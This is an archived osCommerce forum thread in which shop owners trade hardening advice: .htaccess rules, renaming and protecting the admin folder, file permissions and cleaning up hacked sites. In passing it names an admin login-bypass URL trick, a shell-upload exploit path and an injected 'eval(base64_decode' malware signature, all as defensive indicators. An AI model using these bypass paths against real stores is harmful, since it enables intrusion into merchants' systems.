♥FWR Media Posted December 23, 2010 Posted December 23, 2010 Hello, Thank you for this add on. I would know if this contribution work fine with your rewriting contribution Regards Loic This thread isn't an addon .. it's a general information thread about how to secure osCommerce 2.2 Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls KissMT Dynamic SEO Meta & Canonical Header Tags KissER Error Handling and Debugging KissIT Image Thumbnailer Security Pro - Querystring protection against hackers ( a KISS contribution ) If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
qkzoo Posted January 7, 2011 Posted January 7, 2011 I would like to add htaccess protection as recommended, but am not sure even where to begin. The only thing I do understand is to change the items listed in red, to my specific data. Where is this htaccess file, and do I just basically copy everything in this "htaccess_protection.htm" to this file? Thanks for any help, Andy
Guest Posted January 10, 2011 Posted January 10, 2011 Andy, You're obviously looking at the htaccess contribution and can see the many scripts written within it. Use your FTP to look at the files for osCommerce. You SHOULD see an .htaccess file in the root [catalog] directory as osCommerce comes with one. You can add the scripts that work for you from the contribution. NOT ALL WILL WORK. So, if you add them one at a time, test the site and continue to add the next, that is the best approach. TIP: Some hosting providers HIDE the .htaccess from view using FTP. So if you can not see one, or have created a new one and uploaded it to your hosting provider and STILL can not see it, then you will have to use your hosting providers cpanel File Manager to access and edit the file. Chris
qkzoo Posted January 11, 2011 Posted January 11, 2011 Hey, there was a tip for protection against "ANTI Cross Site Scripting attacks" using a .htaccess code. The instructions for the code said "only 10 lines to add to your htaccess file." Which .htaccess file should I add these codes to? I have a bunch of .htaccess files in different directories through out my entire site. Should I put it in my catalog directory, or even deeper below my public_html directory? Thanks, Andy
qkzoo Posted January 12, 2011 Posted January 12, 2011 Is there a reliable website that will "test" your security?
renatoronner Posted January 12, 2011 Posted January 12, 2011 https://cdbrasil.com.br/ HAHA, I REMOVE THE IMAGES, EVERYTHING ITS GREAT, BUT I NEED TO PUT IMAGES :((( PLEASE HELP ME PEOPLE :(
bitwit Posted January 22, 2011 Posted January 22, 2011 I've noticed that after I go browse around my store as 'guest' and then let my browser sit untouched for about 30 minutes on any page I can get access to 'admin' just by typing in the admin URL like 'http://www.mysite.com/catalog/admin/' (of course I changed the name) This seems to give full access to admin functions until I hit 'logout' again, browse site for a few minutes, let sit, and again I get 'admin' access after 'logout' with out log-in again. both htaccess and htpasswd are in place as recommended. has anyone else noticed this ?
bitwit Posted January 22, 2011 Posted January 22, 2011 noticed that after I go browse around my store as 'guest' and then let my browser sit untouched for about 30 minutes on any page I can get access to 'admin' just by typing in the admin URL like 'http://www.mysite.com/catalog/admin/' I have commented out the lines that make up this segment... // try to automatically login with the HTTP Authentication values if it exists... ... ... ...in the file catalog/admin/includes/application_top.php around line 165 this seems to have cured it, have tried twice in the last hour to gain admin access as before but getting redirect to admin login now btw: osC v2.3.1
FIMBLE Posted January 29, 2011 Posted January 29, 2011 By following the security measures in this post, adding htaccess protection to your admin, and renaming your admin you will protect yourself from this, in fact just renaming your admin would do it. But the more protection you have the better. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions
bitwit Posted January 30, 2011 Posted January 30, 2011 By following the security measures in this post, adding htaccess protection to your admin, and renaming your admin you will protect yourself from this, in fact just renaming your admin would do it. But the more protection you have the better. Nic Hi, renaming 'admin' was one of the first things I did during install, using the name 'admin' here so readers know what I'm referring to. commenting out the section mentioned stopped it immediately granted, one would have to know the admin folder real name to exploit this but obscurity is no replacement for security.
FIMBLE Posted January 31, 2011 Posted January 31, 2011 granted, one would have to know the admin folder real name to exploit this but obscurity is no replacement for security. I do not beleive i was suggesting that, but what it does do is immediately remove the threat of that script, in the meantime security measures can be taken to help prevent attacks on the admin, as we all know renaming the folder will in no way hide it from snoopers and it will not take long to find it either, so it had to be part of a holistic solution not a standalone measure. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions
pikeymr Posted February 3, 2011 Posted February 3, 2011 Just found this thread. I had most of these security measures in place for a long time: renaming the admin, password protection, etc. When I check Who's Online I still see things like this- /catalog/index.php/admin/file_manager.php/login.php My question is- they're not actually harming anything, are they? I mean, my 'admin' is named something else, is password protected, and file_manager.php doesn't exist. Anything to worry about here? Thanks
Follkes Posted February 3, 2011 Posted February 3, 2011 They are trying to break in, but if you have admin folder renamed they only hit a wall. Ban those IP, and erase file_manager...
pac_indahood Posted February 8, 2011 Posted February 8, 2011 Hello, i did all security things, but i still have 2 problems: 1) on my server periodically appear strange files like this c145688d97d79801101b48b667862943 (without extension) 2) in webmaster - keywords i have strage words like viagra - i don't sale things like this! my site is still hacked Please help me. Thanks
PJ2006 Posted February 9, 2011 Posted February 9, 2011 Can anyone recommend a good cheap hosting service in the uk? Fasthost looks good I use Webhosting UK - generally they are pretty good.
Taipo Posted February 9, 2011 Posted February 9, 2011 The thing that bothers me about many of the contributions to security for oscommerce is that they are often stabs in the dark codes that do not directly address the types of attacks users are experiencing. For example there have been at least 2 regular methods of gaining access to files. One is via the admin folder and the other is a slightly more difficult method of injecting straight into the database. The admin method has hardly been addressed in any of the addons I have seen to date. Yet there are dozens of them. In the next line under: // Include application configuration parameters require('includes/configure.php'); in admin/includes/application_top.php Add: if(stristr($_SERVER['REQUEST_URI'],'.php/login')) { die(); } This will put a serious dent in using the /admin/categories.php/login.php trick to get a look into your admin area. The rest is as others have already stated if you have already been hacked: 1/ clean out all the other admins that attackers have registered in your admin area previously, 2/ clean out all the php files in the images folders (and subfolders), 3/ make sure every other folder other than the images folder is chan modded to 755. 4/ have a look in all files that previously had 666 permissions, for instance sometimes includes/header.php or .htaccess is writeable. Change those to 644. In particular look for added code in these files that looks like: eval(base64_decode("DQppZiAoIWZ1bmN0aW9uX2V4aXN.... I have not looked all the way through oscommerce but I doubt there is any use for eval() at all in this application. 5/ in the main includes folder add the following .htaccess file Options All -Indexes <Files *.php> Order Deny,Allow ## Deny from all RewriteEngine On RewriteRule .* http://www.yourmaindomainname.com [R,L] </Files> (obviously change http://www.yourmaindomainname.com to your domain name) This takes care of that 'other' exploit that has never been patched (/includes/classes/actions.php?module=[sHeLL]) by redirecting anyone trying to directly access files within the includes folder and subfolders. 6/ Change the user and password to your MYSQL database. If you have been hacked in the past then there is a high chance that the attackers have uploaded some shell code to your site giving them access to at least read files in oscommerce. That means they could quite easily read the configure.php file in /includes/. Usually Cpanel webhosts auto configure your username and password to be the same as the MYSQL username and password with a few minor changes, so its not difficult to back engineer what the Cpanel login would be, if an attacker got their hands on your configure.php file. 7/ Add .htaccess restrictions to your admin folder. Hope this helps. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
pdcelec Posted February 9, 2011 Posted February 9, 2011 I use Webhosting UK - generally they are pretty good. eukhost have been good to me
kenkja Posted February 19, 2011 Posted February 19, 2011 Hello All, Long time no speak. I finally got round to os-commerce. I have installed version 2.3.1 and have been reading through all 29 pages of this post and various others to decide what security I need to do, so do I have this correct 1. Upload Security Pro & add code to includes/application_top.php 2. Change all the permissions to at 644 for files (or 444 for 2 x configure.php if server will take it)& 755 for folders 3. Rename the admin file 4. Password protect the re-named admin file Do I need to delete define_language.php file and if so are there any lines of code which need removing as a result of its deletion. Os-commerce v2.3.3 Security Pro v11 Site Monitor IP Trap htaccess Protection Bad Behaviour Block Year Make Model Document Manager X Sell Star Product Modular Front Page Modular Header Tags
♥geoffreywalton Posted February 20, 2011 Posted February 20, 2011 Ken You could have saved yourself some time. Everything you need to do is in the first post in this thread and the links in there. So slightly more than you have listed above. HTH G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
kenkja Posted February 20, 2011 Posted February 20, 2011 Hello G Thats life, I guess, maybe I've read too much & can't see the wood from the trees, but I've gained the impression that some of the security issues have been resolved in 2.3.1. For sure I can't find file_manager.php in the admin folder. Ken Os-commerce v2.3.3 Security Pro v11 Site Monitor IP Trap htaccess Protection Bad Behaviour Block Year Make Model Document Manager X Sell Star Product Modular Front Page Modular Header Tags
Juto Posted February 20, 2011 Posted February 20, 2011 Hello, I thought I'd share this with you. It's simple but strong... If you have ftp access to your site, in the root folders htaccess add: #Instead of showing access denied redirect to index.php #ErrorDocument 403 /access_error.php?id=403 #Like so ErrorDocument 403 /index.php?id=403 #Below add (use your renamed admin) RewriteRule ^admin\/?$ - [F] In the admin folder add this to your htaccess: # check admissible IP-address # Protect files and directories from prying eyes. <FilesMatch "..."> Order deny,allow Deny from all # allow your ip address: allow from 12.34.56.78 </FilesMatch> NB: This means that you have to edit the above before you can access admin. Sara Contributions: http://addons.oscommerce.com/info/8010 http://addons.oscommerce.com/info/8204 http://addons.oscommerce.com/info/8681
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.